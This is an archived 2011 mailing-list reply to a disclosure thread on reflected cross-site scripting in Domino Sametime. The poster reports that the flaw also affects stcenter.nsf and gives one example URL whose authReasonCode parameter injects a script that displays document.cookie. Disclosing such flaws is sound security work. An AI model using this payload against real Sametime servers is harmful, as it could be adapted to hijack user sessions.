OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: Domino Sametime Multiple Reflected Cross-Site Scripting

barkleyusa.net
Date: Tue Feb 22 2011 - 07:08:15 CST


Hi,

I discovered similar XSS affecting Domino Sametime some time ago...

This XSS affects other scripts also...

i.e. stcenter.nsf

Here's an example:

/stcenter.nsf?OpenDatabase&authReasonCode="><script>alert(document.cookie);</script>"

Cheers

Andrew